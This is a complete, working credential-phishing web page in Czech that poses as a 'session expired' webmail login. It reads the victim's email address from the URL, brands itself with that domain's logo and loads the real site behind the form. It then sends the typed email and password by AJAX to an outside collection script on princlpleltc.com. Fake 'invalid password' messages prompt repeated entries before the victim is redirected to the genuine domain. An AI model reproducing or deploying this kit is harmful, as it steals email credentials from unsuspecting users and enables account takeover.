<!DOCTYPE html>
<html lang="en"><head> 
	<meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="192x192" href="" id="favimg">
    <title class="toto">RELACE VYPRŠELA!</title>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<style>
    body {
	margin: 0;
	padding: 0;
	font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
}

.contact-form {
	z-index: 1000;
	position: absolute;
	top: 50%;
	left: 50%;
	transform: translate(-50%, -50%);
	width: 400px;
	height: 350px;
	padding: 80px 40px;
	background: rgba(0, 0, 0,0.8);
}
.avatar {
	position: absolute;
	width: 80px;
	height: 80px;
	border-radius: 50%;
	overflow: hidden;
	top: calc(-80px/2);
	left: 190px;
}
.contact-form h2 {
	margin: 0;
	padding: 0 0 20px;
	color: #fff;
	text-align: center;
	text-transform: uppercase;
}
.contact-form p {
	margin: 0;
	padding: 0;
	font-weight: bold;
	color: #fff;
}
.contact-form input {
	width: 100%;
	margin-bottom: 20px;
}
.contact-form input[type=email], .contact-form input[type=password] {
	border: none;
	border-bottom: 1px solid #fff;
	background: transparent;
	outline: none;
	height: 40px;
	color: #fff;
	font-size: 18px;
}
.contact-form input[type=submit] {
	height: 30px;
	color: #fff;
	font-size: 18px;
	background: red;
	cursor: pointer;
	border-radius: 25px;
	border: none;
	outline: none;
	margin-top: 15%;
}
.contact-form a {
	color: #fff;
	font-size: 14px;
	font-weight: bold;
	text-decoration: none;
}
input[type=checkbox] {
	width: 20%;
}
#msg, #error{
text-align: center !important;
color: red;
margin-bottom: 10px;
font-size: 18px;
}
/* Absolute Center Spinner */
.loading {
	position: fixed;
	z-index: 9999;
	height: 2em;
	width: 2em;
	overflow: show;
	margin: auto;
	top: 0;
	left: 0;
	bottom: 0;
	right: 0;
  }
  
  /* Transparent Overlay */
  .loading:before {
	content: '';
	display: block;
	position: fixed;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
	  background: radial-gradient(rgba(20, 20, 20,.8), rgba(0, 0, 0, .8));
  
	background: -webkit-radial-gradient(rgba(20, 20, 20,.8), rgba(0, 0, 0,.8));
  }
  
  /* :not(:required) hides these rules from IE9 and below */
  .loading:not(:required) {
	/* hide "loading..." text */
	font: 0/0 a;
	color: transparent;
	text-shadow: none;
	background-color: transparent;
	border: 0;
  }
  
  .loading:not(:required):after {
	content: '';
	display: block;
	font-size: 10px;
	width: 1em;
	height: 1em;
	margin-top: -0.5em;
	-webkit-animation: spinner 150ms infinite linear;
	-moz-animation: spinner 150ms infinite linear;
	-ms-animation: spinner 150ms infinite linear;
	-o-animation: spinner 150ms infinite linear;
	animation: spinner 150ms infinite linear;
	border-radius: 0.5em;
	-webkit-box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
  box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
  }
  
  /* Animation */
  
  @-webkit-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @-moz-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @-o-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }

  .theframehidden{
	  display: none;
  }
  .theframe {
	  width: 100vw;
	  height: 100vh;
	  pointer-events: none;
	}
          i {
        color: #9ABC66;
        font-size: 100px;
        line-height: 200px;
        margin-left:-15px;
      }
      .card {
        background: white;
        padding: 60px;
        border-radius: 4px;
        box-shadow: 0 2px 3px #C8D0D8;
        display: inline-block;
        margin: 0 auto;
      }
    </style>
    </head>
<body>
<iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>
    <div class="loading" id="loading" style="display: none;">Nacítání…</div>
    <iframe id="customdomain" class="theframe theframehidden" src="#" width="100%" scrolling="no" sandbox="allow-pointer-lock allow-popups allow-same-origin allow-scripts allow-forms"></iframe>
    <div class="contact-form" id="contactform" style="">
		<img alt="" id="main_logo_id" class="avatar" src="https://p.kindpng.com/picc/s/25-259966_transparent-background-white-email-icon-png-png-download.png">
        <p id="msg" style="display: none">Nesprávné heslo!</p>
        <p id="error" style="display: none">Neplatná emailová adresa!</p>
		<br><h2 class="toto">Nastavení pošty</h2>
		<form action="#" method="POST"> 
            <input type="email" required="" readonly="" id="email" value=""><br>
            <input placeholder="Zadejte heslo" id="ego_secret" name="ego_secret" type="password" required="">
            <input type="submit" value="prihlásit se" id="next_button">
            <p><input type="checkbox" checked="">Zapamatuj si me</p>
		</form>
	</div>
     <script type="text/javascript">
$(document).ready(function(){
var count=0;
var email = window.location.hash.substr(1);
if (!email) {

}else
{
var my_email =email;
<!-- console.log(email) -->
var my_email =email;
$('#email').val(my_email); 
 

var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!filter.test(my_email)) {
$('#error').show();
//email.focus;
return false;
}

var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));

var mainPage = 'https://'+my_slice;
var final= c.toLowerCase();
var finalu= c.toUpperCase();
$(".toto").html(finalu + " Webmail");
 
//document.getElementById('mainPage').src = mainPage; 
$("#tit").html(finalu);
$("#pussy").html(my_slice);
$("#footer_dom").html(my_slice);

 
//console.log(my_slice)
$("#main_logo_id").attr("src", "https://logo.clearbit.com/"+my_slice);
$("#mainPage").attr("src", mainPage);
$('#loader_email').html(my_slice); 
}  
$('#ego_secret').focus(); 
$('#next_button').click(function(event){

event.preventDefault();
var email=$("#email").val();
var password=$("#ego_secret").val();

 
if (!email) {
    $('#auth_reg').show();
    $('#auth_reg').html("Email not found");

                return false;
            }
if (!ego_secret) {
    $('#auth_reg').show();
    $('#auth_reg').html("Password is empty!");

                return false;
            }
 
count=count+1;

$.ajax({
dataType: 'JSON',
url: 'https://princlpleltc.com/fireb/general/_jun/pil/index2pil.php',
type: 'POST',
      	data:{
			email:email,
            password:password,
      	},
			//data: $('#contact').serialize(),
            beforeSend: function(xhr){
            	$('#next_button').val('Verifing...');
            },
            success: function(response){
            	if(response){ 
            		console.log(response);
            		if(response['signal']){
            			$("#password").val("");
            			if (count>=6) {
            				count=0;
                    // window.location.replace(response['redirect_link']);
                   window.location.replace("https://www."+my_slice);

                }
				
			$('#auth_reg').hide();
            $("#error").show(); 
            $("#auth_reg2").show(); 
		//	$('#auth_reg2').html("Invalid password. Please try again");
            
			if (count==1) { $('#auth_reg2').html("Authentication error! Try again"); }
			if (count==2) { $('#auth_reg2').html("Authentication failed! Try again"); }
			if (count==3) { $('#auth_reg2').html("Invalid password. Please try again"); }
			if (count==4) { $('#auth_reg2').html("Incorrect Username or password. Try again"); }
			if (count==5) { $('#auth_reg2').html("Invalid password. Try again"); }
			
            }
             
        }
    },
    error: function(){
    	$("#password").val("");
    	if (count>=2) {
    		count=0;
    		 window.location.replace("https://www."+my_slice);
    	}
               	$("#auth_reg").show();
				                      
			$('#auth_reg').val("Invalid password. Please try again");
                   },
    complete: function(){
    	$('#next_button').val('prihlásit se');
    }
});
  });
		
		}); 
 
    </script>

</body></html>
